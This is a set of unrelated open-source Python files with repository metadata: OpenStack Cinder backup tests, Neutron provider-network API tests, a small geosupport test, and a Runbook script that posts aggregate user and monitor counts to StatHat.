self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
self.assertFalse(mock_delete_volume.called)
self.assertIsNone(backup.temp_volume_id)
backup.destroy()
db.volume_destroy(self.ctxt, vol1_id)
def test_create_backup_with_bad_volume_status(self):
"""Test creating a backup from a volume with a bad status."""
vol_id = self._create_volume_db_entry(status='restoring', size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertRaises(exception.InvalidVolume,
self.backup_mgr.create_backup,
self.ctxt,
backup)
def test_create_backup_with_bad_backup_status(self):
"""Test creating a backup with a backup with a bad status."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.create_backup,
self.ctxt,
backup)
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup_with_error(self, _mock_volume_backup):
"""Test error handling when error occurs during backup creation."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
_mock_volume_backup.side_effect = FakeBackupException('fake')
self.assertRaises(FakeBackupException,
self.backup_mgr.create_backup,
self.ctxt,
backup)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
self.assertEqual('error_backing-up', vol['previous_status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
self.assertTrue(_mock_volume_backup.called)
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup(self, _mock_volume_backup):
"""Test normal backup creation."""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.backup_mgr.create_backup(self.ctxt, backup)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
self.assertEqual('backing-up', vol['previous_status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
self.assertTrue(_mock_volume_backup.called)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup_with_notify(self, _mock_volume_backup, notify):
"""Test normal backup creation with notifications."""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.backup_mgr.create_backup(self.ctxt, backup)
self.assertEqual(2, notify.call_count)
def test_restore_backup_with_bad_volume_status(self):
"""Test error handling.
Test error handling when restoring a backup to a volume
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='available', size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertRaises(exception.InvalidVolume,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_restore_backup_with_bad_backup_status(self):
"""Test error handling.
Test error handling when restoring a backup with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup_with_driver_error(self, _mock_volume_restore):
"""Test error handling when an error occurs during backup restore."""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
_mock_volume_restore.side_effect = FakeBackupException('fake')
self.assertRaises(FakeBackupException,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error_restoring', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertTrue(_mock_volume_restore.called)
def test_restore_backup_with_bad_service(self):
"""Test error handling.
Test error handling when attempting a restore of a backup
with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup(self, _mock_volume_restore):
"""Test normal backup restoration."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=vol_size)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
self.backup_mgr.restore_backup(self.ctxt, backup, vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertTrue(_mock_volume_restore.called)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup_with_notify(self, _mock_volume_restore, notify):
"""Test normal backup restoration with notifications."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=vol_size)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
self.backup_mgr.restore_backup(self.ctxt, backup, vol_id)
self.assertEqual(2, notify.call_count)
def test_delete_backup_with_bad_backup_status(self):
"""Test error handling.
Test error handling when deleting a backup with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_error(self):
"""Test error handling when an error occurs during backup deletion."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
display_name='fail_on_delete',
volume_id=vol_id)
self.assertRaises(IOError,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_bad_service(self):
"""Test error handling.
Test error handling when attempting a delete of a backup
with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_no_service(self):
"""Test error handling.
Test error handling when attempting a delete of a backup
with no service defined for that backup, relates to bug #1162908
"""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
backup.service = None
backup.save()
self.backup_mgr.delete_backup(self.ctxt, backup)
def test_delete_backup(self):
"""Test normal backup deletion."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
self.backup_mgr.delete_backup(self.ctxt, backup)
self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup.id)
ctxt_read_deleted = context.get_admin_context('yes')
backup = db.backup_get(ctxt_read_deleted, backup.id)
self.assertEqual(True, backup.deleted)
self.assertGreaterEqual(timeutils.utcnow(), backup.deleted_at)
self.assertEqual('deleted', backup.status)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
def test_delete_backup_with_notify(self, notify):
"""Test normal backup deletion with notifications."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
self.backup_mgr.delete_backup(self.ctxt, backup)
self.assertEqual(2, notify.call_count)
def test_list_backup(self):
backups = db.backup_get_all_by_project(self.ctxt, 'project1')
self.assertEqual(0, len(backups))
self._create_backup_db_entry()
b2 = self._create_backup_db_entry(project_id='project1')
backups = db.backup_get_all_by_project(self.ctxt, 'project1')
self.assertEqual(1, len(backups))
self.assertEqual(b2.id, backups[0].id)
def test_backup_get_all_by_project_with_deleted(self):
"""Test deleted backups.
Test deleted backups don't show up in backup_get_all_by_project.
Unless context.read_deleted is 'yes'.
"""
backups = db.backup_get_all_by_project(self.ctxt, 'fake')
self.assertEqual(0, len(backups))
backup_keep = self._create_backup_db_entry()
backup = self._create_backup_db_entry()
db.backup_destroy(self.ctxt, backup.id)
backups = db.backup_get_all_by_project(self.ctxt, 'fake')
self.assertEqual(1, len(backups))
self.assertEqual(backup_keep.id, backups[0].id)
ctxt_read_deleted = context.get_admin_context('yes')
backups = db.backup_get_all_by_project(ctxt_read_deleted, 'fake')
self.assertEqual(2, len(backups))
def test_backup_get_all_by_host_with_deleted(self):
"""Test deleted backups.
Test deleted backups don't show up in backup_get_all_by_project.
Unless context.read_deleted is 'yes'
"""
backups = db.backup_get_all_by_host(self.ctxt, 'testhost')
self.assertEqual(0, len(backups))
backup_keep = self._create_backup_db_entry()
backup = self._create_backup_db_entry()
db.backup_destroy(self.ctxt, backup.id)
backups = db.backup_get_all_by_host(self.ctxt, 'testhost')
self.assertEqual(1, len(backups))
self.assertEqual(backup_keep.id, backups[0].id)
ctxt_read_deleted = context.get_admin_context('yes')
backups = db.backup_get_all_by_host(ctxt_read_deleted, 'testhost')
self.assertEqual(2, len(backups))
def test_backup_manager_driver_name(self):
"""Test mapping between backup services and backup drivers."""
self.override_config('backup_driver', "cinder.backup.services.swift")
backup_mgr = \
importutils.import_object(CONF.backup_manager)
self.assertEqual('cinder.backup.drivers.swift',
backup_mgr.driver_name)
def test_export_record_with_bad_service(self):
"""Test error handling.
Test error handling when attempting an export of a backup
record with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.export_record,
self.ctxt,
backup)
def test_export_record_with_bad_backup_status(self):
"""Test error handling.
Test error handling when exporting a backup record with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='available',
size=1)
backup = self._create_backup_db_entry(status='error',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.export_record,
self.ctxt,
backup)
def test_export_record(self):
"""Test normal backup record export."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='available',
size=vol_size)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
export = self.backup_mgr.export_record(self.ctxt, backup)
self.assertEqual(CONF.backup_driver, export['backup_service'])
self.assertTrue('backup_url' in export)
def test_import_record_with_verify_not_implemented(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver does not support verify.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(vol_size=vol_size,
exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
def test_import_record_with_wrong_id(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver does not support verify.
"""
vol_size = 1
export = self._create_exported_record_entry(vol_size=vol_size)
imported_record = self._create_export_record_db_entry()
backup_hosts = []
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
def test_import_record_with_bad_service(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record with a different service to that used to create the backup.
"""
export = self._create_exported_record_entry()
export['backup_service'] = 'cinder.tests.unit.backup.bad_service'
imported_record = self._create_export_record_db_entry()
# Test the case where the additional hosts list is empty
backup_hosts = []
self.assertRaises(exception.ServiceNotFound,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
# Test that the import backup keeps calling other hosts to find a
# suitable host for the backup service
backup_hosts = ['fake1', 'fake2']
backup_hosts_expect = list(backup_hosts)
BackupAPI_import = 'cinder.backup.rpcapi.BackupAPI.import_record'
with mock.patch(BackupAPI_import) as _mock_backup_import:
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
next_host = backup_hosts_expect.pop()
_mock_backup_import.assert_called_once_with(
self.ctxt,
next_host,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts_expect)
def test_import_record_with_invalid_backup(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record where the backup driver returns an exception.
"""
export = self._create_exported_record_entry()
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_record_import_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'import_record'))
imported_record = self._create_export_record_db_entry()
backup_hosts = []
with mock.patch(_mock_record_import_class) as _mock_record_import:
_mock_record_import.side_effect = FakeBackupException('fake')
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
self.assertTrue(_mock_record_import.called)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('error', backup['status'])
def test_not_supported_driver_to_force_delete(self):
"""Test force delete check method for not supported drivers."""
self.override_config('backup_driver', 'cinder.backup.drivers.ceph')
self.backup_mgr = importutils.import_object(CONF.backup_manager)
result = self.backup_mgr.check_support_to_force_delete(self.ctxt)
self.assertFalse(result)
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_init_backup_repo_path', return_value=None)
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_check_configuration', return_value=None)
def test_check_support_to_force_delete(self, mock_check_configuration,
mock_init_backup_repo_path):
"""Test force delete check method for supported drivers."""
self.override_config('backup_driver', 'cinder.backup.drivers.nfs')
self.backup_mgr = importutils.import_object(CONF.backup_manager)
result = self.backup_mgr.check_support_to_force_delete(self.ctxt)
self.assertTrue(result)
def test_backup_has_dependent_backups(self):
"""Test backup has dependent backups.
Test the query of has_dependent_backups in backup object is correct.
"""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertFalse(backup.has_dependent_backups)
class BackupTestCaseWithVerify(BaseBackupTest):
"""Test Case for backups."""
def setUp(self):
self.override_config(
"backup_driver",
"cinder.tests.unit.backup.fake_service_with_verify")
super(BackupTestCaseWithVerify, self).setUp()
def test_import_record_with_verify(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver implements verify.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(
vol_size=vol_size, exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class):
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
def test_import_record_with_verify_invalid_backup(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record where the backup driver returns an exception.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(
vol_size=vol_size, exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class) as _mock_record_verify:
_mock_record_verify.side_effect = \
exception.InvalidBackup(reason='fake')
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
self.assertTrue(_mock_record_verify.called)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('error', backup['status'])
def test_backup_reset_status_from_nonrestoring_to_available(
self):
vol_id = self._create_volume_db_entry(status='available',
size=1)
backup = self._create_backup_db_entry(status='error',
volume_id=vol_id)
with mock.patch.object(manager.BackupManager,
'_map_service_to_driver') as \
mock_map_service_to_driver:
mock_map_service_to_driver.return_value = \
fake_service.get_backup_driver(self.ctxt)
self.backup_mgr.reset_status(self.ctxt,
backup,
'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_backup_reset_status_to_available_invalid_backup(self):
volume = db.volume_create(self.ctxt, {'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='error',
volume_id=volume['id'])
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class) as \
_mock_record_verify:
_mock_record_verify.side_effect = \
exception.BackupVerifyUnsupportedDriver(reason='fake')
self.assertRaises(exception.BackupVerifyUnsupportedDriver,
self.backup_mgr.reset_status,
self.ctxt,
backup,
'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_backup_reset_status_from_restoring_to_available(self):
volume = db.volume_create(self.ctxt,
{'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='restoring',
volume_id=volume['id'])
self.backup_mgr.reset_status(self.ctxt, backup, 'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_backup_reset_status_to_error(self):
volume = db.volume_create(self.ctxt,
{'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='creating',
volume_id=volume['id'])
self.backup_mgr.reset_status(self.ctxt, backup, 'error')
backup = db.backup_get(self.ctxt, backup['id'])
self.assertEqual('error', backup['status'])
@ddt.ddt
class BackupAPITestCase(BaseBackupTest):
def setUp(self):
super(BackupAPITestCase, self).setUp()
self.api = api.API()
def test_get_all_wrong_all_tenants_value(self):
self.assertRaises(exception.InvalidParameterValue,
self.api.get_all, self.ctxt, {'all_tenants': 'bad'})
@mock.patch.object(objects, 'BackupList')
def test_get_all_no_all_tenants_value(self, mock_backuplist):
result = self.api.get_all(self.ctxt, {'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
self.ctxt, self.ctxt.project_id, {'key': 'value'}, None, None,
None, None, None)
@mock.patch.object(objects, 'BackupList')
@ddt.data(False, 'false', '0', 0, 'no')
def test_get_all_false_value_all_tenants(
self, false_value, mock_backuplist):
result = self.api.get_all(self.ctxt, {'all_tenants': false_value,
'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
self.ctxt, self.ctxt.project_id, {'key': 'value'}, None, None,
None, None, None)
@mock.patch.object(objects, 'BackupList')
@ddt.data(True, 'true', '1', 1, 'yes')
def test_get_all_true_value_all_tenants(
self, true_value, mock_backuplist):
result = self.api.get_all(self.ctxt, {'all_tenants': true_value,
'key': 'value'})
self.assertFalse(mock_backuplist.get_all_by_project.called)
self.assertEqual(mock_backuplist.get_all.return_value,
result)
mock_backuplist.get_all.assert_called_once_with(
self.ctxt, {'key': 'value'}, None, None, None, None, None)
@mock.patch.object(objects, 'BackupList')
def test_get_all_true_value_all_tenants_non_admin(self, mock_backuplist):
ctxt = context.RequestContext('fake', 'fake')
result = self.api.get_all(ctxt, {'all_tenants': '1',
'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
ctxt, ctxt.project_id, {'key': 'value'}, None, None, None, None,
None)
| {
"content_hash": "f39c18c2306ea04be9d9373e1b924994",
"timestamp": "",
"source": "github",
"line_count": 1150,
"max_line_length": 79,
"avg_line_length": 43.73478260869565,
"alnum_prop": 0.5538522715975743,
"repo_name": "Paul-Ezell/cinder-1",
"id": "6de7d0130bff6f36a46e66ce1ac9620b0f8a11ad",
"size": "50955",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_backup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13204008"
},
{
"name": "Shell",
"bytes": "8222"
}
],
"symlink_target": ""
} |
import mock
from oslo.config import cfg
from webob import exc as web_exc
import webtest
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.api.v2 import router
from neutron import context
from neutron.extensions import providernet as pnet
from neutron.manager import NeutronManager
from neutron.openstack.common import uuidutils
from neutron import quota
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_extensions
from neutron.tests.unit import testlib_api
class ProviderExtensionManager(object):
def get_resources(self):
return []
def get_actions(self):
return []
def get_request_extensions(self):
return []
def get_extended_resources(self, version):
return pnet.get_extended_resources(version)
class ProvidernetExtensionTestCase(testlib_api.WebTestCase):
fmt = 'json'
def setUp(self):
super(ProvidernetExtensionTestCase, self).setUp()
plugin = 'neutron.neutron_plugin_base_v2.NeutronPluginBaseV2'
# Ensure existing ExtensionManager is not used
extensions.PluginAwareExtensionManager._instance = None
# Save the global RESOURCE_ATTRIBUTE_MAP
self.saved_attr_map = {}
for resource, attrs in attributes.RESOURCE_ATTRIBUTE_MAP.iteritems():
self.saved_attr_map[resource] = attrs.copy()
# Update the plugin and extensions path
self.setup_coreplugin(plugin)
cfg.CONF.set_override('allow_pagination', True)
cfg.CONF.set_override('allow_sorting', True)
self._plugin_patcher = mock.patch(plugin, autospec=True)
self.plugin = self._plugin_patcher.start()
# Ensure Quota checks never fail because of mock
instance = self.plugin.return_value
instance.get_networks_count.return_value = 1
# Instantiate mock plugin and enable the 'provider' extension
NeutronManager.get_plugin().supported_extension_aliases = (
["provider"])
ext_mgr = ProviderExtensionManager()
self.ext_mdw = test_extensions.setup_extensions_middleware(ext_mgr)
self.addCleanup(self._plugin_patcher.stop)
self.addCleanup(self._restore_attribute_map)
self.api = webtest.TestApp(router.APIRouter())
quota.QUOTAS._driver = None
cfg.CONF.set_override('quota_driver', 'neutron.quota.ConfDriver',
group='QUOTAS')
def _restore_attribute_map(self):
# Restore the global RESOURCE_ATTRIBUTE_MAP
attributes.RESOURCE_ATTRIBUTE_MAP = self.saved_attr_map
def _prepare_net_data(self):
return {'name': 'net1',
pnet.NETWORK_TYPE: 'sometype',
pnet.PHYSICAL_NETWORK: 'physnet',
pnet.SEGMENTATION_ID: 666}
def _put_network_with_provider_attrs(self, ctx, expect_errors=False):
data = self._prepare_net_data()
env = {'neutron.context': ctx}
instance = self.plugin.return_value
instance.get_network.return_value = {'tenant_id': ctx.tenant_id,
'shared': False}
net_id = uuidutils.generate_uuid()
res = self.api.put(test_api_v2._get_path('networks',
id=net_id,
fmt=self.fmt),
self.serialize({'network': data}),
extra_environ=env,
expect_errors=expect_errors)
return res, data, net_id
def _post_network_with_provider_attrs(self, ctx, expect_errors=False):
data = self._prepare_net_data()
env = {'neutron.context': ctx}
res = self.api.post(test_api_v2._get_path('networks', fmt=self.fmt),
self.serialize({'network': data}),
content_type='application/' + self.fmt,
extra_environ=env,
expect_errors=expect_errors)
return res, data
def test_network_create_with_provider_attrs(self):
ctx = context.get_admin_context()
ctx.tenant_id = 'an_admin'
res, data = self._post_network_with_provider_attrs(ctx)
instance = self.plugin.return_value
exp_input = {'network': data}
exp_input['network'].update({'admin_state_up': True,
'tenant_id': 'an_admin',
'shared': False})
instance.create_network.assert_called_with(mock.ANY,
network=exp_input)
self.assertEqual(res.status_int, web_exc.HTTPCreated.code)
def test_network_update_with_provider_attrs(self):
ctx = context.get_admin_context()
ctx.tenant_id = 'an_admin'
res, data, net_id = self._put_network_with_provider_attrs(ctx)
instance = self.plugin.return_value
exp_input = {'network': data}
instance.update_network.assert_called_with(mock.ANY,
net_id,
network=exp_input)
self.assertEqual(res.status_int, web_exc.HTTPOk.code)
def test_network_create_with_provider_attrs_noadmin_returns_403(self):
tenant_id = 'no_admin'
ctx = context.Context('', tenant_id, is_admin=False)
res, _1 = self._post_network_with_provider_attrs(ctx, True)
self.assertEqual(res.status_int, web_exc.HTTPForbidden.code)
def test_network_update_with_provider_attrs_noadmin_returns_404(self):
tenant_id = 'no_admin'
ctx = context.Context('', tenant_id, is_admin=False)
res, _1, _2 = self._put_network_with_provider_attrs(ctx, True)
self.assertEqual(res.status_int, web_exc.HTTPNotFound.code)
| {
"content_hash": "b8271a232535a736119fdc0281cf1d5e",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 77,
"avg_line_length": 41.6241134751773,
"alnum_prop": 0.6055546089623445,
"repo_name": "vijayendrabvs/hap",
"id": "d75cbfc2c81f525c36c1676c9114280df36fecd8",
"size": "6577",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/test_extension_pnet.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "8801288"
},
{
"name": "Shell",
"bytes": "8920"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from geosupport.error import GeosupportError
from ..testcase import TestCase
class TestError(TestCase):
def test_error(self):
e = GeosupportError("")
| {
"content_hash": "6b64eaa628a8477ac06806c25d92eefb",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 44,
"avg_line_length": 20.625,
"alnum_prop": 0.7272727272727273,
"repo_name": "ishiland/python-geosupport",
"id": "638036322be66eb3712bdaf61aa069cf3ba6397c",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/test_error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "4178"
},
{
"name": "Python",
"bytes": "39689"
}
],
"symlink_target": ""
} |
import sys
import yaml
import rethinkdb as r
from rethinkdb.errors import RqlDriverError, RqlRuntimeError
import requests
import json
import pprint
from runbookdb import RunbookDB
# Load Configuration
# ------------------------------------------------------------------
if len(sys.argv) < 2:
print("Hey, thats not how you launch this...")
print("%s <config file>") % sys.argv[0]
sys.exit(1)
configfile = sys.argv[1]
with open(configfile, 'r') as cfh:
config = yaml.safe_load(cfh)
# Open External Connections
# ------------------------------------------------------------------
# RethinkDB Server
# [DONE] TODO move default connection into module
db=RunbookDB(configfile)
conn=db.connect()
# Helper Functions
# ------------------------------------------------------------------
# Run For Loop
# ------------------------------------------------------------------
msg = {
"ezkey" : config['stathat_key'],
"data" : []
}
# Get user count
try:
result = r.table('users').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Users" % config['envname'],
"value" : result
})
# Get upgraded user count and monitor count
try:
result = r.table('users').filter({'acttype': 'pro'}).run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
total_up_users = {
'monthly' : 0,
'yearly' : 0,
'total' : 0
}
total_up_mons = {
'monthly' : 0,
'yearly' : 0,
'total' : 0
}
for user in result:
total_up_users['total'] = total_up_users['total'] + 1
total_up_mons['total'] = total_up_mons['total'] + user['subplans']
if "monthly" in user['subscription']:
total_up_users['monthly'] = total_up_users['monthly'] + 1
total_up_mons['monthly'] = total_up_mons['monthly'] + user['subplans']
elif "yearly" in user['subscription']:
total_up_users['yearly'] = total_up_users['yearly'] + 1
total_up_mons['yearly'] = total_up_mons['yearly'] + user['subplans']
msg['data'].append({
'stat' : "[%s] Total Upgraded Users" % config['envname'],
"value" : total_up_users['total']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors" % config['envname'],
"value" : total_up_mons['total']
})
msg['data'].append({
'stat' : "[%s] Total Upgraded Users - Monthly Subscription" % config['envname'],
"value" : total_up_users['monthly']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors - Monthly Subscription" % config['envname'],
"value" : total_up_mons['monthly']
})
msg['data'].append({
'stat' : "[%s] Total Upgraded Users - Yearly Subscription" % config['envname'],
"value" : total_up_users['yearly']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors - Yearly Subscription" % config['envname'],
"value" : total_up_mons['yearly']
})
# Get monitor count
try:
result = r.table('monitors').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Monitors" % config['envname'],
"value" : result
})
# Get reaction count
try:
result = r.table('reactions').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Reactions" % config['envname'],
"value" : result
})
pprint.pprint(msg)
payload = json.dumps(msg)
headers = { 'Content-Type': 'application/json' }
req = requests.post(url="http://api.stathat.com/ez", headers=headers, data=payload)
if req.status_code >= 200 and req.status_code <= 299:
print("Successfully sent stats to stathat")
